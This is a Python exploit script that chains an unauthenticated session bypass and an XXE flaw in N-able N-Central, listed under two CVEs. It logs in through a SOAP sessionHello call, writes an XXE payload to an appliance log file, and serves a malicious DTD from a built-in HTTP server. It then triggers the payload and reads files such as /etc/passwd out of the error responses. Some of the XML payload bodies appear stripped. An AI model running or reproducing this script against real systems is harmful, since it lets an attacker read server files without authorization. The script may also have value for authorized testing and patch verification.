#!/usr/bin/env python3
"""
N-able N-Central Unauthenticated XXE Vulnerability Exploit (CVE-2025-9316 and CVE-2025-11700)
Usage: python3 ncentral_xxe_file_read.py --url http://10.0.40.62 --listen-ip 192.168.1.100 --listen-port 8080
"""
import argparse
import requests
import base64
import xml.etree.ElementTree as ET
import re
import sys
import threading
import socket
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urljoin
class DTDHandler(BaseHTTPRequestHandler):
"""HTTP handler for serving the evil DTD file"""
def __init__(self, target_file, *args, **kwargs):
self.target_file = target_file
super().__init__(*args, **kwargs)
def do_GET(self):
"""Handle GET requests for the DTD file"""
if self.path == '/evil.dtd':
dtd_content = f'''
">
%eval;
%error;'''
self.send_response(200)
self.send_header('Content-Type', 'application/xml-dtd')
self.send_header('Content-Length', str(len(dtd_content)))
self.end_headers()
self.wfile.write(dtd_content.encode('utf-8'))
print(f"[+] Served evil.dtd to {self.client_address[0]}")
else:
self.send_response(404)
self.end_headers()
def log_message(self, format, *args):
"""Suppress default HTTP server logging"""
pass
class DTDServer:
"""Simple HTTP server to host the DTD file"""
def __init__(self, listen_ip, listen_port, target_file="/etc/passwd"):
self.listen_ip = listen_ip
self.listen_port = listen_port
self.target_file = target_file
self.server = None
self.thread = None
def start(self):
"""Start the DTD server in a background thread"""
try:
# Create handler with target_file bound
handler = lambda *args, **kwargs: DTDHandler(self.target_file, *args, **kwargs)
self.server = HTTPServer((self.listen_ip, self.listen_port), handler)
self.thread = threading.Thread(target=self.server.serve_forever, daemon=True)
self.thread.start()
print(f"[+] Started DTD server at http://{self.listen_ip}:{self.listen_port}/evil.dtd")
if self.listen_ip == '0.0.0.0':
print(f"[+] Server listening on all interfaces (0.0.0.0:{self.listen_port})")
else:
print(f"[+] Server listening on {self.listen_ip}:{self.listen_port}")
time.sleep(0.5) # Give server time to start
return True
except Exception as e:
print(f"[-] Failed to start DTD server: {e}")
raise
def stop(self):
"""Stop the DTD server"""
if self.server:
self.server.shutdown()
print(f"[+] Stopped DTD server")
class NableXXEExploit:
def __init__(self, base_url):
self.base_url = base_url.rstrip('/')
self.session = requests.Session()
# Disable SSL warnings for self-signed certificates
requests.packages.urllib3.disable_warnings()
self.session.verify = False
self.dtd_server = None
def step1_get_session_id(self, appliance_id=3):
"""Step 1: Get limited appliance session ID via sessionHello bypass"""
print(f"[+] Step 1: Getting session ID for appliance {appliance_id}")
# SessionHello SOAP request to ServerUI endpoint
soap_request = f'''
{appliance_id}
'''
url = urljoin(self.base_url, '/dms/services/ServerUI')
headers = {
'SOAPAction': '""',
'Content-Type': 'text/xml; charset=utf-8'
}
try:
response = self.session.post(url, data=soap_request, headers=headers)
print(f"Status Code: {response.status_code}")
if response.status_code == 200:
# Parse the session ID from response
session_id = self.parse_session_id(response.text)
if session_id:
print(f"[+] Got session ID: {session_id}")
return session_id
else:
print("[-] Could not extract session ID from response")
print(f"Response: {response.text[:500]}")
else:
print(f"[-] Failed to get session ID: {response.text}")
except requests.RequestException as e:
print(f"[-] Request failed: {e}")
return None
def parse_session_id(self, response_text):
"""Extract session ID from SOAP response"""
try:
# Look for session ID in the response (try different case variations)
patterns = [
r']*>(\d+)', # Capital case
r'(\d+)', # Lowercase
r'(\d+)', # Mixed case
]
for pattern in patterns:
session_match = re.search(pattern, response_text)
if session_match:
return session_match.group(1)
except Exception as e:
print(f"[-] Error parsing session ID: {e}")
return None
def step2_write_xxe_payload(self, session_id, target_file, listen_ip, listen_port):
"""Step 2: Write XXE payload file using applianceLogSubmit"""
print(f"[+] Step 2: Writing XXE payload to target {target_file}")
# Create XXE payload
xxe_payload = f'''
%xxe;
]>
Network XXE Test
'''
# Base64 encode the payload
encoded_payload = base64.b64encode(xxe_payload.encode('utf-8')).decode('utf-8')
# SOAP request to write the file
soap_request = f'''
{session_id}
NETWORK_CHECK_LOG
{encoded_payload}
'''
url = urljoin(self.base_url, '/dms/services/ServerMMS')
headers = {
'SOAPAction': '""',
'Content-Type': 'text/xml; charset=utf-8'
}
try:
response = self.session.post(url, data=soap_request, headers=headers)
print(f"Status Code: {response.status_code}")
if response.status_code == 200:
print("[+] XXE payload file written successfully")
return True
else:
print(f"[-] Failed to write payload: {response.text}")
except requests.RequestException as e:
print(f"[-] Request failed: {e}")
return False
def step3_trigger_xxe(self, target_file="/etc/passwd", appliance_id=3):
"""Step 3: Trigger XXE via importServiceTemplateFromFile"""
print(f"[+] Step 3: Triggering XXE to read {target_file}")
# The file path where our payload was written
payload_file = f"/opt/nable/webapps/ROOT/applianceLog/network_check_log_{appliance_id}.log"
# SOAP request to trigger XXE
soap_request = f'''
1
1
{payload_file}
'''
url = urljoin(self.base_url, '/dms/services/ServerUI')
headers = {
'SOAPAction': '""',
'Content-Type': 'text/xml; charset=utf-8'
}
try:
response = self.session.post(url, data=soap_request, headers=headers)
print(f"Status Code: {response.status_code}")
#print(f"Response: {response.text}")
# Look for file contents in error message
self.extract_file_contents(response.text, target_file)
except requests.RequestException as e:
print(f"[-] Request failed: {e}")
def extract_file_contents(self, response_text, target_file):
"""Extract file contents from XXE error response"""
print(f"\n[+] Attempting to extract {target_file} contents from response:")
# Look for file contents in the detail section - they appear after /nonexistent/
detail_match = re.search(r'\[tid:[^\]]+\] /nonexistent/(.*?)(?: \(File name too long\))?', response_text, re.DOTALL)
if detail_match:
file_contents = detail_match.group(1).strip()
print(f"SUCCESS! Extracted {target_file} contents:")
print("=" * 60)
print(file_contents)
print("=" * 60)
return file_contents
# Fallback to other patterns
patterns = [
r'(.*?)',
r'(.*?)',
r'error.*?file:///.*?/(.*?)\'',
]
for pattern in patterns:
matches = re.findall(pattern, response_text, re.DOTALL)
for match in matches:
if len(match.strip()) > 50: # Likely contains file contents
print(f"Potential file contents found:")
print("=" * 50)
print(match.strip())
print("=" * 50)
return match.strip()
print("[-] Could not extract file contents from response")
print("Full response for manual analysis:")
print(response_text)
def run_full_exploit(self, target_file, listen_ip, listen_port, appliance_id):
"""Run the complete exploit chain"""
print(f"[+] Starting N-able N-Central XXE exploit against {self.base_url}")
print(f"[+] Target file: {target_file}")
print(f"[+] DTD server: {listen_ip}:{listen_port}")
# Start DTD server
print("[+] Starting built-in DTD server...")
self.dtd_server = DTDServer(listen_ip, listen_port, target_file)
if not self.dtd_server.start():
print("[-] Failed to start DTD server, aborting")
return False
try:
# Step 1: Get session ID
session_id = self.step1_get_session_id(appliance_id)
if not session_id:
print("[-] Failed to get session ID, aborting")
return False
# Step 2: Write XXE payload
if not self.step2_write_xxe_payload(session_id, target_file, listen_ip, listen_port):
print("[-] Failed to write XXE payload, aborting")
return False
# Give the target a moment to process the file write
print("[+] Waiting 2 seconds for file write to complete...")
time.sleep(2)
# Step 3: Trigger XXE
self.step3_trigger_xxe(target_file, appliance_id)
return True
finally:
# Stop DTD server
if self.dtd_server:
self.dtd_server.stop()
def test_endpoints(self):
"""Test if the vulnerable endpoints are accessible"""
print(f"[+] Testing endpoint accessibility on {self.base_url}")
endpoints = [
'/dms/services/ServerUI',
'/dms/services/ServerMMS'
]
for endpoint in endpoints:
url = urljoin(self.base_url, endpoint)
try:
response = self.session.get(url)
print(f"[+] {endpoint}: Status {response.status_code}")
if response.status_code == 200 and 'wsdl' in response.text.lower():
print(f" WSDL endpoint detected")
except requests.RequestException as e:
print(f"[-] {endpoint}: Error - {e}")
def main():
parser = argparse.ArgumentParser(
description='N-able N-Central XXE Vulnerability Exploit',
epilog='''
Examples:
python3 nable_xxe_exploit.py --url http://10.0.40.62 --listen-ip 192.168.1.100 --listen-port 8080
python3 nable_xxe_exploit.py --url http://10.0.40.62 --listen-ip 192.168.1.100 --listen-port 8080 --file /etc/hosts
python3 nable_xxe_exploit.py --url http://10.0.40.62 --test-only
'''
)
parser.add_argument('--url', required=True, help='N-Central Base URL')
parser.add_argument('--listen-ip', required=True, help='IP address for DTD server to bind to')
parser.add_argument('--listen-port', type=int, required=True, help='Port for DTD server to bind to')
parser.add_argument('--file', default='/etc/passwd', help='Target file to read (default: /etc/passwd)')
parser.add_argument('--appliance-id', type=int, default=3, help='Appliance ID to use (default: 3)')
parser.add_argument('--test-only', action='store_true', help='Only test endpoint accessibility')
args = parser.parse_args()
exploit = NableXXEExploit(args.url)
if args.test_only:
exploit.test_endpoints()
else:
exploit.run_full_exploit(args.file, args.listen_ip, args.listen_port, args.appliance_id)
if __name__ == '__main__':
main()